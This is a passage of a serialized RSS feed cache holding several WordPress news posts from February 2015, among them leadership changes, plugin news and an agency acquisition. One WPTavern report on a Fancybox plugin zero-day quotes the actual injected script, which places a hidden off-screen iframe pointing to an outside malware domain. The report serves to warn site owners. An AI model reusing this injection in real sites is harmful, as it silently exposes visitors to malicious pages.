changes\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:30:\"https://poststatus.com/?p=8385\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:56:\"https://poststatus.com/wordpress-lead-developer-changes/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:4131:\"<p>Yesterday, <a href=\"https://make.wordpress.org/core/2015/02/03/new-lead-developers-helen-and-dion/\">it was announced</a> that Helen Hou-Sandí and Dion Hulse are now lead developers of the WordPress project. That announcement, we learned today, is tied to another: that Peter Westwood and Ryan Boren <a href=\"https://make.wordpress.org/core/2015/02/04/new-chapters-for-ryan-and-westi/\">are stepping down</a> from their lead developer roles.</p>\n<p>Peter and Ryan have been enormously influential on the project.</p>\n<p>Ryan Boren has been committing to the WordPress codebase for over 11 years (aka: since the beginning), and has more commits — 7,961 according to Open Hub — than anyone. Peter has been committing for 7 years, and has 1,261 commits to his name. However, a lead developer’s influence goes well beyond commit; they are the guardians of the project.</p>\n<p>Both Ryan and Peter have been more quiet lately than years prior. Andrew Nacin describes it like so:</p>\n<blockquote><p>For some time now, Ryan and Peter have avoided weighing in on technical matters. Very simply, when you aren’t able to be active in development, you know you’re not up to speed, and you realize your words shouldn’t carry the weight that they do. Being able to make this <a href=\"http://nacin.com/2014/02/07/how-wordpress-chooses-committers/\">judgment</a> is one of the things that makes both of them such great leaders.</p></blockquote>\n<p>Peter will step into an emeritus role:</p>\n<blockquote><p>Peter will be moving into a dormant/inactive/emeritus status. We hope to have him back when his life and work allows. In the meantime, you may see him committing a bug fix here and there, as he is wont to do.</p></blockquote>\n<p>Ryan has shifted his focus, however, and is concentrating fully on UX in WordPress:</p>\n<blockquote><p>Ryan has been focusing all of his energy on improving UX for more than a year, especially for mobile and touch devices, and especially for workflows like media management. So I’m pleased to say he’ll continue to do that:<strong>Ryan will be spearheading UX for WordPress in 2015.</strong> It’s been a while since we’ve had someone truly focusing on just UX, so this is really exciting.</p></blockquote>\n<p>With this shift, Helen and Dion are stepping into official roles to represent their enormous impact on the project over the last several years.</p>\n<p>(Note: this bit of the post will look familiar to Club members)</p>\n<p>Helen works for <a href=\"http://10up.com/\">10up</a>, a WordPress consulting agency, and spends nearly 100% of her time on the WordPress.org project. She <a href=\"https://make.wordpress.org/core/2012/12/18/commit-promotions/\">received commit access</a> in late 2012, at the beginning of the 3.6 release cycle. You can follow <a href=\"https://twitter.com/helenhousandi\">@helenhousandi</a> on Twitter, and <a href=\"http://helenhousandi.com/\">visit her website</a> as well.</p>\n<p>These are the first additions to the list of lead developers for WordPress since Andrew Nacin became a lead in 2012, before the WordPress 3.5 release.</p>\n<p>I asked Andrew Nacin how these decisions are made, and he responded with the following:</p>\n<blockquote>\n<p class=\"p1\"><span class=\"s1\">After each release, the lead developers review the current list of guest committers, potentially propose new committers, etc. Any proposals are finalized through consensus.</span></p>\n</blockquote>\n<p>This is a big honor and an uncommon occurrence for the WordPress project. Major congratulations are due to both Helen and Dion.</p>\n<p>Also, we all owe Peter and Ryan a huge round of applause and thanks for their contributions — past, present, and future — to the WordPress project.</p>\n<p>The WordPress.org <a href=\"https://wordpress.org/about\">About</a> page maintains the list of lead developers for WordPress, and with yesterday and today’s announcement, we’re back to five Lead Developers plus Matt Mullenweg as Project Lead. The website now reflects these changes, with fancy (and totally serious) titles for the new lead developers.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 04 Feb 2015 22:52:18 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:15:\"Brian Krogsgard\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:11;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:76:\"WPTavern: Zero Day Vulnerability Discovered in Fancybox for WordPress Plugin\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=38478\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:86:\"http://wptavern.com/zero-day-vulnerability-discovered-in-fancybox-for-wordpress-plugin\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:3172:\"<p>Four hours ago, users seeking support on WordPress.org <a href=\"https://wordpress.org/support/topic/possible-malware-2?replies=41\" target=\"_blank\">reported malware injected into their sites</a> from an unknown source. The vulnerability allows for an iframe to be injected, redirecting to a “203koko” site.</p>\n<pre class=\"brush: xml; light: true; title: ; notranslate\">\n<script>/*<![CDATA[*/if(navigator.userAgent.match(/msie/i)){document.write(\' <div style=\"position:absolute;left:-2000px;width:2000px\"><iframe src=\"http://203koko.eu/hjnfh/ipframe2.php\" width=\"20\" height=\"30\" ></iframe></div>\');}/*]]>*/</script>\n</pre>\n<p>After working together to determine the plugins they have in common, users identified <a href=\"https://wordpress.org/plugins/fancybox-for-wordpress/\" target=\"_blank\">Fancybox for WordPress</a> as the culprit. It has since been temporarily removed from the WordPress Plugins Directory, as it hasn’t been updated for two years and poses a security threat to users. The plugin has received more than half a million downloads and is likely in use on thousands of WordPress sites.</p>\n<p><a href=\"https://kovshenin.com/\" target=\"_blank\">Konstantin Kovshenin</a> and <a href=\"http://codeseekah.com/\" target=\"_blank\">Gennady Kovshenin</a> worked together to analyze sites from affected users to confirm the vulnerability. There is currently no patch, so users of the plugin are advised to turn it off immediately.</p>\n<blockquote class=\"twitter-tweet\" width=\"550\"><p>If you are running Fancybox for <a href=\"https://twitter.com/hashtag/WordPress?src=hash\">#WordPress</a> turn it off now! It contains a persistent XSS <a href=\"https://twitter.com/hashtag/vulnerability?src=hash\">#vulnerability</a> <a href=\"https://twitter.com/hashtag/security?src=hash\">#security</a> <a href=\"https://twitter.com/hashtag/infosec?src=hash\">#infosec</a></p>\n<p>— Gennady Kovshenin (@soulseekah) <a href=\"https://twitter.com/soulseekah/status/563054468183654400\">February 4, 2015</a></p></blockquote>\n<p></p>\n<p>Analysts at Sucuri have <a href=\"http://blog.sucuri.net/2015/02/zero-day-in-the-fancybox-for-wordpress-plugin.html\" target=\"_blank\">confirmed via Website Firewall logs</a> that the vulnerability is being actively exploited:</p>\n<blockquote><p>After some analysis, we can confirm that this plugin has a serious vulnerability that allows for malware (or any random script/content) to be added to the vulnerable site. Because it is currently unpatched, we will not disclose more information.</p>\n<p>What makes things worse, is that it’s being actively exploited in the wild, leading to many compromised websites.</p></blockquote>\n<p>Users who have this plugin installed on their sites have no other option than to disable it, as no patch is available yet. The plugin’s author, <a href=\"https://twitter.com/moskis\" target=\"_blank\">José Pardilla</a>, is aware of the issue and <a href=\"https://wordpress.org/support/topic/not-safe-2?replies=3\" target=\"_blank\">responded to an affected user</a> five hours ago in the plugin’s forum on WordPress.org. A patch should be forthcoming.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 04 Feb 2015 20:57:33 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:12;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:73:\"WPTavern: WordPress.com Adds Google Analytics for Business Customers Only\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=38461\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:83:\"http://wptavern.com/wordpress-com-adds-google-analytics-for-business-customers-only\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:3378:\"<p>Last week WordPress.com <a href=\"http://en.blog.wordpress.com/2015/01/29/google-analytics-for-wordpress-com-business-sites/\" target=\"_blank\">announced</a> that Google Analytics is now available for its customers on the <a href=\"https://wordpress.com/plans/\" target=\"_blank\">business tier</a>, which is priced at $299.00 per year. Users have been <a href=\"http://en.forums.wordpress.com/topic/google-analytics-please/page/3?replies=107\" target=\"_blank\">clamoring for the feature</a> for years. While many enjoy using the built-in Stats feature, it is severely limited in comparison to Google Analytics and the data is not portable if the user moves to another publishing platform.</p>\n<p>Business customers can now enter a GA tracking ID under Settings → Analytics screen in the new site management area.</p>\n<p><a href=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2015/02/google-analytics-wpdotcom.png\" rel=\"prettyphoto[38461]\"><img src=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2015/02/google-analytics-wpdotcom.png?resize=1025%2C668\" alt=\"google-analytics-wpdotcom\" class=\"aligncenter size-full wp-image-38468\" /></a></p>\n<p>Access to setting up Google Analytics was added to the new backend administration area. Automattic CEO Matt Mullenweg confirms in the comments that all future new features will bypass the old /wp-admin dashboard in favor of the new interface.</p>\n<p>“[There are] no plans to put any new features into the wp-admin dashboard, beyond what comes from core updates from the open source side,” Mullenweg <a href=\"http://en.blog.wordpress.com/2015/01/29/google-analytics-for-wordpress-com-business-sites/#comment-217148\" target=\"_blank\">replied</a> to a comment on the post.</p>\n<p>“You don’t have to stop using wp-admin, and it’s not going anywhere, it’s just not where we’re focusing our energy right now,” he said, in response to a user’s confusion about the two separate admin areas. “As you’ve probably noticed, most of our new updates and iterations are happening in the new interface. You’ll see lots of improvements there in the coming months.”</p>\n<p>Users on the free and premium plans were disappointed that Google Analytics will not be available for all, given that it’s a free service. WordPress.com opted to limit the feature to business customers in order to make it more compelling for users to upgrade to the highest pricing tier. They have taken to the WordPress.com support forums to express <a href=\"http://en.forums.wordpress.com/topic/google-analytics-for-all?replies=2\" target=\"_blank\">dissatisfaction</a> in the feature’s restriction.</p>\n<p>In the past, users have adapted various <a href=\"http://en.forums.wordpress.com/topic/you-can-run-google-analytics-on-a-wordpresscom-blog-heres-how?replies=1\" target=\"_blank\">jerry-rigged methods of adding Google Analytics to WordPress.com sites</a>, using a mapped domain with Cloudflare + Google Analytics enabled. While this is a proven <a href=\"http://jonathonbalogh.com/2012/05/07/how-to-use-google-analytics-on-a-wordpress-com-blog/\" target=\"_blank\">solution</a> for adding the tracking code, it requires using a custom domain with WordPress.com, as well as the ability to follow a few technical instructions. At this time, there is no easy way to add Google Analytics to the bottom tier accounts.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 04 Feb 2015 20:16:14 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:13;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:70:\"WPTavern: Personalize Profile Headers with the BuddyPress Cover Plugin\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=38414\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:80:\"http://wptavern.com/personalize-profile-headers-with-the-buddypress-cover-plugin\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:3220:\"<p>Cover photos in user profiles is a design feature in place on many major social networking sites, including Facebook, Twitter, and G+. Users enjoy having the ability to further personalize their profiles beyond the default square avatar. Twitter was one of the last to add this feature to timelines in 2012, and when it did, everyone excitedly rushed to <a href=\"http://mashable.com/2012/09/18/how-to-change-twitter-header-image/\" target=\"_blank\">personalize their header images</a>.</p>\n<p>The <a href=\"https://wordpress.org/plugins/bp-cover/\" target=\"_blank\">BuddyPress Cover</a> plugin was created to bring this feature to BuddyPress sites. It allows users to upload a cover image and adapts nicely to nearly every theme.</p>\n<p><a href=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/02/bp-cover.png\" rel=\"prettyphoto[38414]\"><img src=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/02/bp-cover.png?resize=724%2C489\" alt=\"bp-cover\" class=\"aligncenter size-full wp-image-38422\" /></a></p>\n<p>In addition to the AJAX image upload capabilities, the plugin allows the user to drag the image to re-position it. If the image exceeds the maximum file size, the user will see a warning at the top of the page, prompting him to select another. Believe it or not, the plugin even supports animated gifs as cover images.</p>\n<p>BuddyPress Cover also integrates with the activity stream to post an update when a user adds a new cover photo, similar to what you might see on Facebook.</p>\n<p><a href=\"http://i1.wp.com/wptavern.com/wp-content/uploads/2015/02/bp-cover-activity-update.png\" rel=\"prettyphoto[38414]\"><img src=\"http://i1.wp.com/wptavern.com/wp-content/uploads/2015/02/bp-cover-activity-update.png?resize=644%2C471\" alt=\"bp-cover-activity-update\" class=\"aligncenter size-full wp-image-38440\" /></a></p>\n<p>I tested the plugin with multiple themes and found that it basically inherits the styles and widths included in your active theme. Most likely you won’t have anything to worry about in terms of theme compatibility. The only thing I noticed is that user profile pictures will need to be larger than 140px square or else the plugin will show the mystery man in the header.</p>\n<p>The plugin’s author plans to add the same capabilities to groups so that admins add cover photos to personalize group pages. So far the plugin has received excellent reviews and users are eager to see more features added to it.</p>\n<p>User suggestions for future releases include the ability to select from previously uploaded cover photos and auto-cropping of the photo in activity updates to match the size shown in the cover area. The developer is open to suggestions and has already pushed out a few point releases in response to bug reports and requests.</p>\n<p>The BuddyPress Cover plugin is a valuable addition to any developer’s toolbox, as clients will often request features they have seen on other social networks. If you’re looking to add greater customization capabilities to user profiles while maintaining the clean design of your theme, this plugin fits the bill. You can <a href=\"https://wordpress.org/plugins/bp-cover/\" target=\"_blank\">download</a> it from WordPress.org.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 04 Feb 2015 00:03:22 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:14;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:29:\"Matt: World Pun Championships\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:21:\"http://ma.tt/?p=44646\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:45:\"http://ma.tt/2015/02/world-pun-championships/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:848:\"<blockquote><p>The Pun-Off, held annually since 1978, matches the peculiar energy of a place where the unofficial slogan is “Keep Austin Weird.” This is the city, after all, that organizes Eeyore’s Birthday Party, an outdoor costume party honoring the depressed donkey from Winnie-the-Pooh. […]</p>\n<p>It’s a reunion of legends past. Steve Brooks, a country singer with a mop of gray hair, is the only other person besides Ziek to have won both Punslingers and Punniest of Show in the same year. Retired from competition, he now serves as a judge and emcee.</p></blockquote>\n<p><a href=\"http://www.laweekly.com/news/at-the-world-pun-championships-victory-is-easier-said-than-punned-4767308\">Everything about this article about the World Pun Championships in Austin is amazing</a>, I want to quote the entire thing.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Tue, 03 Feb 2015 23:58:00 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:4:\"Matt\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:15;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:64:\"WPTavern: Is WordPress Suffering From The Innovator’s Dilemma?\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=38412\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:70:\"http://wptavern.com/is-wordpress-suffering-from-the-innovators-dilemma\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:4845:\"<a href=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/02/InnovationDilemmaFeaturedImage.png\" rel=\"prettyphoto[38412]\"><img class=\"size-full wp-image-38420\" src=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/02/InnovationDilemmaFeaturedImage.png?resize=631%2C323\" alt=\"Innovation Dilemma Featured Image\" /></a>photo credit: <a href=\"http://www.flickr.com/photos/37996588780@N01/273978773\">Scrabble</a> – <a href=\"https://creativecommons.org/licenses/by-sa/2.0/\">(license)</a>\n<p>I’ve used WordPress for more than seven years and I can’t think of any features it has that are innovative. I believe part of the reason is that I’ve been stuck in the WordPress bubble for so long, I haven’t been exposed to different ways of doing things. I only know the WordPress way and that’s a dangerous way of thinking.</p>\n<h2>The Innovator’s Dilemma</h2>\n<p>In 1997, <a class=\"mw-redirect\" title=\"Clayton Christensen\" href=\"http://en.wikipedia.org/wiki/Clayton_Christensen\">Clayton Christensen</a> published the <a title=\"http://en.wikipedia.org/wiki/The_Innovator%27s_Dilemma\" href=\"http://en.wikipedia.org/wiki/The_Innovator%27s_Dilemma\">Innovator’s Dilemma</a>. The book suggests that successful <a class=\"mw-redirect\" title=\"Companies\" href=\"http://en.wikipedia.org/wiki/Companies\">companies</a> can put too much emphasis on customers current needs, and fail to adopt new technology or business models that will meet their customer’s unstated or future needs. Christensen argues that such companies will eventually fall behind.</p>\n<a href=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2015/02/InnovatorsDilemma.png\" rel=\"prettyphoto[38412]\"><img class=\"size-full wp-image-38419\" src=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2015/02/InnovatorsDilemma.png?resize=571%2C466\" alt=\"Book Cover to Innovators Dilemma\" /></a>Book Cover to Innovators Dilemma\n<p>During his appearance at PressNomics, <a title=\"https://twitter.com/jeffr0/status/558778370792493056\" href=\"https://twitter.com/jeffr0/status/558778370792493056\">Matt Mullenweg said</a> that he’s, “worried we have become too much of an inward facing community and afraid to make a painful leap forward to make the next WordPress.” His statement is open to interpretation, but if you compare the WordPress open source project to a company and its users to customers, perhaps what he’s referring to is the idea that WordPress has fallen into the innovator’s dilemma.</p>\n<h2>External Innovation</h2>\n<p>In the Advanced WordPress Facebook group, Joost de Valk responded to Mullenweg’s statement with, “Most innovation is done outside in, not inside out. But to be honest Matt, that’s where the problem lies too. The ‘inside’ is very negative towards change, and is constantly throwing up hurdles. They like small incremental steps, but fear bigger ones.”</p>\n<p>Core WordPress development is done by a trusted team of people who have remained in core decision-making positions for years. It’s rare that an individual new to the community gets commit access or even gets to lead a release within two years.</p>\n<p>I don’t think it’s impossible, but if brand new contributors from outside of the WordPress bubble have little to no influence on the project, where is the opportunity for external innovation?</p>\n<h2>Leading by Example</h2>\n<p>Another statement Mullenweg made at PressNomics is that he wants to lead another release. Leading a release gives him the opportunity to lead by example and push for big changes, something he feels the community fears.</p>\n<h2>A Thought Experiment</h2>\n<p>What do you think are innovative features in WordPress? I’m especially curious to see how users answer the question versus developers. I’d also like to know what features in other publishing systems WordPress could learn from. An excellent example is the post editor in Medium which Mullenweg <a title=\"https://twitter.com/jeffr0/status/558777784932118531\" href=\"https://twitter.com/jeffr0/status/558777784932118531\">has admitted</a> offers a better experience than WordPress.</p>\n<h2>Can WordPress Avoid Irrelevance?</h2>\n<p>The road to 50% market share is tough and to some, <a title=\"http://wptavern.com/how-important-is-jetpack-on-wordpress-road-to-50-market-share#comment-63337\" href=\"http://wptavern.com/how-important-is-jetpack-on-wordpress-road-to-50-market-share#comment-63337\">is impossible</a> to achieve. Without innovation and continuous improvements to satisfy the needs of users, it’s entirely possible for WordPress to develop itself into irrelevance. Then again, what could WordPress developers do today to prevent this from happening? Is it a matter of changing philosophies and strategies or is it something else?</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Tue, 03 Feb 2015 23:20:13 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Jeff Chandler\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:16;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:70:\"WPTavern: Human Made Acquires Australian Based WordPress Agency Sennza\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=38401\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:80:\"http://wptavern.com/human-made-acquires-australian-based-wordpress-agency-sennza\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:2074:\"<a href=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2014/08/MergeFeaturedImage.png\" rel=\"prettyphoto[38401]\"><img class=\"size-full wp-image-28143\" src=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2014/08/MergeFeaturedImage.png?resize=678%2C252\" alt=\"Merge Featured Image\" /></a>photo credit: <a href=\"https://www.flickr.com/photos/rutlo/3743291132/\">rutlo</a> – <a href=\"http://creativecommons.org/licenses/by/2.0/\">cc</a>\n<p><a title=\"http://hmn.md/\" href=\"http://hmn.md/\">Human Made</a> has acquired Australian based WordPress development agency <a title=\"http://www.sennza.com.au/\" href=\"http://www.sennza.com.au/\">Sennza</a>. Human Made is a development shop with more than 20 employees and has offices scattered across the world. They’re also a <a title=\"http://vip.wordpress.com/partners/\" href=\"http://vip.wordpress.com/partners/\">WordPress.com VIP partner</a>. Sennza and its three employees will continue to work from their office and become Human Made Australia.</p>\n<p>The move gives Human Made an opportunity to tap into the enterprise market in Australia as well as help out with other projects across Asia, India, and the US West Coast. According to <a title=\"http://www.sennza.com.au/2015/02/03/sennza-joining-human-made/\" href=\"http://www.sennza.com.au/2015/02/03/sennza-joining-human-made/\">Sennza’s announcement</a>, talks of the acquisition began at WordCamp Europe in Sofia, Bulgaria.</p>\n<blockquote><p>Although we had met and spoken with Human Made previously, we got the chance to really meet and hang out with most of the team while at WordCamp Europe in Sofia, Bulgaria which helped to confirm this was the right decision to make.</p></blockquote>\n<p>Earlier this year at PressNomics, one of the topics of discussion is that we’re at the beginning stages of a consolidation period for agencies in the WordPress space. This move solidifies the belief that acquisitions involving 10 employees or less appear likely as larger shops look for opportunities to expand their reach and acquire talent at the same time.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Tue, 03 Feb 2015 22:11:05 